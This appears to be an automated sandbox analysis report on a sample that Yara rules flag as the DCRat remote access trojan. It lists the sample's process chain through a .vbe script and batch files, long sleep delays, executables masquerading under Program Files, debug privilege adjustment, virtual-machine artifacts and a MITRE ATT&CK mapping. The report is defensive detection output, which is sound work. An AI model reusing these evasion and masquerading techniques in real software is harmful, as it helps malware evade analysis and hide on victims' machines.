Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597247
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597131
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596993
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596750
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596523
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596420
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596304
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596166
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596061
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595953
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595843
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595734
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595625
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595502
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595375
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Thread delayed: delay time: 922337203685477
Source: C:\surrogateserverreviewsession\dasHost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\surrogateserverreviewsession\Agentserver.exe	Window / User API: threadDelayed 871	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Window / User API: threadDelayed 1315	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Window / User API: threadDelayed 366	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Window / User API: threadDelayed 366
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Window / User API: threadDelayed 365
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Window / User API: threadDelayed 2147
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Window / User API: threadDelayed 5878
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Window / User API: threadDelayed 359
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Window / User API: threadDelayed 366
Source: C:\surrogateserverreviewsession\dasHost.exe	Window / User API: threadDelayed 450

Source: C:\surrogateserverreviewsession\Agentserver.exe TID: 6640	Thread sleep count: 871 > 30	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe TID: 6640	Thread sleep count: 1315 > 30	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe TID: 6468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe TID: 6672	Thread sleep count: 366 > 30	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe TID: 3752	Thread sleep count: 366 > 30
Source: C:\surrogateserverreviewsession\dasHost.exe TID: 1488	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 3276	Thread sleep count: 365 > 30
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 6200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 2780	Thread sleep count: 2147 > 30
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep count: 34 > 30
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 5504	Thread sleep count: 5878 > 30
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599875s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599764s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599648s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599547s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599437s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599325s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599218s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599109s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -599000s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598890s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598781s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598669s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598562s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598453s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598343s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598234s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598125s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -598015s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597906s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597797s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597687s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597577s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597464s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597358s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597247s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -597131s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -596993s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -596750s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -596523s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -596420s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -596304s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -596166s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -596061s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -595953s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -595843s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -595734s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -595625s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -595502s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1476	Thread sleep time: -595375s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 3788	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe TID: 1892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe TID: 5256	Thread sleep count: 359 > 30
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe TID: 5436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe TID: 940	Thread sleep count: 366 > 30
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe TID: 5084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\surrogateserverreviewsession\dasHost.exe TID: 1576	Thread sleep count: 450 > 30
Source: C:\surrogateserverreviewsession\dasHost.exe TID: 1784	Thread sleep count: 260 > 30
Source: C:\surrogateserverreviewsession\dasHost.exe TID: 7064	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\surrogateserverreviewsession\Agentserver.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\surrogateserverreviewsession\dasHost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0037A5F4
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0038B8E0
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0039AAA8 FindFirstFileExA,	0_2_0039AAA8

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0038DD72 VirtualQuery,GetSystemInfo,

0_2_0038DD72

Source: C:\surrogateserverreviewsession\Agentserver.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 600000
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599875
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599764
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599648
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599547
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599437
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599325
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599218
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599109
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599000
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598890
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598781
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598669
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598562
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598453
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598343
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598234
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598125
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598015
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597906
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597797
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597687
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597577
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597464
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597358
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597247
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597131
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596993
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596750
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596523
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596420
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596304
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596166
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 596061
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595953
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595843
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595734
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595625
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595502
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 595375
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Thread delayed: delay time: 922337203685477
Source: C:\surrogateserverreviewsession\dasHost.exe	Thread delayed: delay time: 922337203685477

Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: w32tm.exe, 00000021.00000002.2173115502.0000024EA4C28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: Agentserver.exe, 00000005.00000002.2126238027.000000001B779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\(`:%
Source: wscript.exe, 00000001.00000003.2094995623.000000000332D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000001.00000003.2094995623.000000000332D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Memory Compression.exe, 00000024.00000002.2238643253.0000000000A66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

API call chain: ExitProcess graph end node

graph_0-24601

Source: C:\surrogateserverreviewsession\Agentserver.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0039866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0039866F

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0039753D mov eax, dword ptr fs:[00000030h]

0_2_0039753D

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0039B710 GetProcessHeap,

0_2_0039B710

Source: C:\surrogateserverreviewsession\Agentserver.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process token adjusted: Debug
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process token adjusted: Debug
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process token adjusted: Debug
Source: C:\surrogateserverreviewsession\dasHost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038F063 SetUnhandledExceptionFilter,	0_2_0038F063
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0038F22B
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0039866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0039866F
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0038EF05

Source: C:\surrogateserverreviewsession\Agentserver.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateserverreviewsession\cAWYZg0ZdjD2dKs6hjKja7TASB4qz.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\surrogateserverreviewsession\Agentserver.exe "C:\surrogateserverreviewsession\Agentserver.exe"	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\surrogateserverreviewsession\dasHost.exe "C:\surrogateserverreviewsession\dasHost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0038ED5B cpuid

0_2_0038ED5B

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0038A63C

Source: C:\surrogateserverreviewsession\Agentserver.exe	Queries volume information: C:\surrogateserverreviewsession\Agentserver.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Queries volume information: C:\surrogateserverreviewsession\dasHost.exe VolumeInformation	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Queries volume information: C:\surrogateserverreviewsession\dasHost.exe VolumeInformation
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Queries volume information: C:\Program Files\7-Zip\Lang\Memory Compression.exe VolumeInformation
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Queries volume information: C:\Program Files\7-Zip\Lang\Memory Compression.exe VolumeInformation
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Queries volume information: C:\Program Files\Windows NT\uXGucUKOPdf.exe VolumeInformation
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Queries volume information: C:\Program Files\Windows NT\uXGucUKOPdf.exe VolumeInformation
Source: C:\surrogateserverreviewsession\dasHost.exe	Queries volume information: C:\surrogateserverreviewsession\dasHost.exe VolumeInformation

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0038D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0038D5D4

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0037ACF5 GetVersionExW,

0_2_0037ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000027.00000002.2256049771.000000000283B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2219542033.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2216128308.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2220090209.0000000003028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2219542033.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2219627479.0000000002F08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2122617723.0000000002A94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2240602993.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2219627479.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2122617723.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2256049771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2217002951.0000000002C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2217002951.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2220090209.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2122617723.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2216128308.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Agentserver.exe PID: 3356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 5740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Memory Compression.exe PID: 1200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Memory Compression.exe PID: 5968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uXGucUKOPdf.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uXGucUKOPdf.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 3228, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000027.00000002.2256049771.000000000283B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2219542033.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2216128308.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2220090209.0000000003028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2219542033.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2219627479.0000000002F08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2122617723.0000000002A94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2240602993.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2219627479.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2122617723.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2256049771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2217002951.0000000002C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2217002951.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2220090209.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2122617723.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2216128308.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Agentserver.exe PID: 3356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 5740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Memory Compression.exe PID: 1200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Memory Compression.exe PID: 5968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uXGucUKOPdf.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uXGucUKOPdf.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 3228, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	23 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
